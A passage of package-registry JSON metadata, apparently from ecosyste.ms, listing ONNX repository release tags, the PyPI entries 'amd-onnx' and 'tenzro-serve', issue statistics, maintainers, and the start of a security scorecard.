0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0/manifests"},{"name":"v1.18.0","sha":"e709452ef2bbc1d113faf678c24e6d3467696e83","kind":"commit","published_at":"2025-05-08T17:33:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.18.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0/manifests"},{"name":"v1.17.0","sha":"b8baa8446686496da4cc8fda09f2b6fe65c2a02c","kind":"commit","published_at":"2024-09-30T22:42:05.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.17.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0/manifests"},{"name":"v1.16.2","sha":"3bf92c03a9f27eba3bda1e5b9e63ea20ec213557","kind":"commit","published_at":"2024-07-31T13:15:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"595228d99e3977ac27cb79d5963adda262af99ad","kind":"commit","published_at":"2024-05-23T16:33:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"990217f043af7222348ca8f0301e17fa7b841781","kind":"commit","published_at":"2024-03-25T13:55:50.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0/manifests"},{"name":"v1.15.0","sha":"b86cc54efce19530fb953e4b21f57e6b3888534c","kind":"commit","published_at":"2023-10-25T22:10:41.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.15.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0/manifests"},{"name":"v1.14.1","sha":"1014f41f17ecc778d63e760a994579d96ba471ff","kind":"commit","published_at":"2023-08-24T22:20:34.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"a0d77f18516d2da7468a96b0de3b737266f23176","kind":"commit","published_at":"2023-05-04T00:14:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0/manifests"},{"name":"v1.13.1","sha":"ad834eb73ee0cd9b6fa9ea892caeed5fa17d7dc0","kind":"commit","published_at":"2023-02-21T22:21:30.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"1ba785612a79fe749aa1e478336e534743372639","kind":"commit","published_at":"2022-12-09T18:56:29.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0/manifests"},{"name":"v1.12.0","sha":"f7ee1ac60d06abe8e26c9b6bbe1e3db5286b614b","kind":"commit","published_at":"2022-06-17T23:32:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.12.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"96046b8ccfb8e6fa82f6b2b34b3d56add2e8849c","kind":"commit","published_at":"2022-02-16T23:56:21.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.11.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0/manifests"},{"name":"v1.10.2","sha":"da889e6b95750350726d149bf447bf0cd1245964","kind":"commit","published_at":"2021-10-25T15:52:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1f63dcb7fcc3a8bf5c3c8e326867ecd6f5c43f35","kind":"commit","published_at":"2021-08-02T16:53:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"7c1e0b0391d06002789e56f8fe0c7bb9f4d1159b","kind":"commit","published_at":"2021-07-30T20:26:55.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"1089b9e8045a3a2882d7bb6a1dbaeaf9cae131da","kind":"commit","published_at":"2021-04-19T09:51:42.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.9.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0/manifests"},{"name":"v1.8.1","sha":"685898bc6f3fd6eb16ba129ea990f96330537e38","kind":"commit","published_at":"2021-01-29T23:23:52.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"994c6181247d7b419b28889fc57d5817e2089419","kind":"commit","published_at":"2020-11-06T05:01:27.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"0c070abb0c40fec649f81a73a75b0098662ec486","kind":"commit","published_at":"2020-05-08T21:09:31.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.7.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"553df22c67bee5f0fe6599cff60f1afc6748c635","kind":"commit","published_at":"2019-09-25T20:35:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.6.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"94d238d96e3fb3a7ba34f03c284b9ad3516163be","kind":"commit","published_at":"2019-04-24T05:05:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.5.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"9e55ace55aad1ada27516038dfbdc66a8a0763db","kind":"commit","published_at":"2019-01-23T23:05:32.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"8a1319733a5518bd0001842db27e2df53a306eff","kind":"commit","published_at":"2019-01-23T01:49:13.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0/manifests"},{"name":"v1.2.3","sha":"5af210ca8a1c73aa6bae8754c9346ec54d0a756e","kind":"commit","published_at":"2018-09-07T22:57:18.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.3","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3/manifests"},{"name":"v1.3.0","sha":"bae6333e149a59a3faa9c4d9c44974373dcf5256","kind":"commit","published_at":"2018-08-30T17:33:20.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.3.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0/manifests"},{"name":"v1.2.2","sha":"3376d4438aaadfba483399fa249b841153152bc0","kind":"commit","published_at":"2018-06-18T18:43:47.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"c7b60050ad6ae963bf2cc1d0eb3c32b07eb7eeed","kind":"commit","published_at":"2018-05-25T02:03:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1/manifests"},{"name":"v1.1.2","sha":"2f85783fc43576b5e39b207f95d5f789641ae706","kind":"commit","published_at":"2018-04-25T23:02:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2/manifests"},{"name":"v1.1.0","sha":"79dc46fa4d484981f75695a73f3d38d5717fc435","kind":"commit","published_at":"2018-03-10T06:34:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"7633012b06b4caf0f829060668d06948c7f42e03","kind":"commit","published_at":"2018-01-26T02:25:37.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1/manifests"},{"name":"v1.0","sha":"5712a94fa8bd9cb4c99f2a5c05156576739f76f4","kind":"commit","published_at":"2017-12-04T21:39:16.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0/manifests"},{"name":"v0.2","sha":"63569b8a2e2ad4f56c5476954337a87cc4428862","kind":"commit","published_at":"2017-10-10T04:52:28.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.2","html_url":"https://github.com/onnx/onnx/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2/manifests"},{"name":"v0.1","sha":"bbe22f447a4f3c38642dc9ca7ba0e8dd1ebaef94","kind":"commit","published_at":"2017-09-07T07:56:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2026-05-12T21:10:21.495Z","dependent_packages_count":0,"downloads":657,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":59.86729557714339,"dependent_packages_count":10.63065240667199,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":35.24897399190769},"purl":"pkg:pypi/amd-onnx","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/amd-onnx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pypi/amd-onnx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/amd-onnx/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-10T15:00:19.617Z","issues_count":1006,"pull_requests_count":2113,"avg_time_to_close_issue":24664529.06717557,"avg_time_to_close_pull_request":3753991.8644729503,"issues_closed_count":654,"pull_requests_closed_count":1793,"pull_request_authors_count":183,"issue_authors_count":609,"avg_comments_per_issue":2.672962226640159,"avg_comments_per_pull_request":1.983909133932797,"merged_pull_requests_count":1455,"bot_issues_count":5,"bot_pull_requests_count":388,"past_year_issues_count":88,"past_year_pull_requests_count":414,"past_year_avg_time_to_close_issue":620480.8333333334,"past_year_avg_time_to_close_pull_request":369965.27091633464,"past_year_issues_closed_count":30,"past_year_pull_requests_closed_count":251,"past_year_pull_request_authors_count":46,"past_year_issue_authors_count":52,"past_year_avg_comments_per_issue":1.7159090909090908,"past_year_avg_comments_per_pull_request":1.4710144927536233,"past_year_bot_issues_count":4,"past_year_bot_pull_requests_count":56,"past_year_merged_pull_requests_count":211,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","maintainers":[{"login":"andife","count":440,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":58,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"jcwchen","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"},{"login":"liqunfu","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"take-cheeze","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"},{"login":"daquexian","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"zhenhuaw-me","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"prasanthpul","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"},{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"},{"login":"houseroad","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"lutzroeder","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"},{"login":"linkerzhang","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"},{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"},{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"},{"login":"KifoPL","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KifoPL"}],"active_maintainers":[{"login":"andife","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"take-cheeze","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx/codemeta","maintainers":[{"uuid":"thiagocrepaldi","login":"thiagocrepaldi","name":null,"email":null,"url":null,"packages_count":5,"html_url":"https://pypi.org/user/thiagocrepaldi/","role":null,"created_at":"2024-07-16T01:03:24.257Z","updated_at":"2024-07-16T01:03:24.257Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/thiagocrepaldi/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":890698,"maintainers_count":381518,"namespaces_count":0,"keywords_count":289179,"github":"pypi","metadata":{"funded_packages_count":54301},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-06-10T05:13:28.296Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":10976311,"name":"tenzro-serve","ecosystem":"pypi","description":"Open Neural Network Exchange","homepage":"https://github.com/tenzro/serve","licenses":"Apache License v2.0","normalized_licenses":[],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2024-10-17T08:20:13.000Z","latest_release_published_at":null,"latest_release_number":null,"last_synced_at":"2026-05-20T06:01:59.217Z","created_at":"2024-10-17T08:30:18.374Z","updated_at":"2026-05-20T06:01:59.218Z","registry_url":"https://pypi.org/project/tenzro-serve/","install_command":"pip install tenzro-serve --index-url https://pypi.org/simple","documentation_url":"https://tenzro-serve.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Programming Language :: Python :: 3"],"normalized_name":"tenzro-serve"},"repo_metadata":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2025-10-27T15:22:48.000Z","size":44729,"stargazers_count":19779,"open_issues_count":283,"forks_count":3816,"subscribers_count":426,"default_branch":"main","last_synced_at":"2025-10-27T17:28:08.029Z","etag":null,"topics":["deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2025-10-27T15:22:58.000Z","dependencies_parsed_at":"2025-04-15T13:18:07.946Z","dependency_job_id":"18eecf52-5a7d-4c8a-88f2-d8c63852c71f","html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2783,"total_committers":358,"mean_commits":7.773743016759776,"dds":0.903701042040963,"last_synced_commit":"f615b26d564ca5d2e2a28af81f4b86a99a1865f1"},"previous_names":[],"tags_count":35,"template":false,"template_full_name":null,"purl":"pkg:github/onnx/onnx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/sbom","scorecard":{"id":245425,"data":{"date":"2025-08-16T10:32:36Z","repo":{"name":"github.com/onnx/onnx","commit":"3e8c39a7c90f06e3a5ea9561c72770649dcb1b4f"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":6.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is 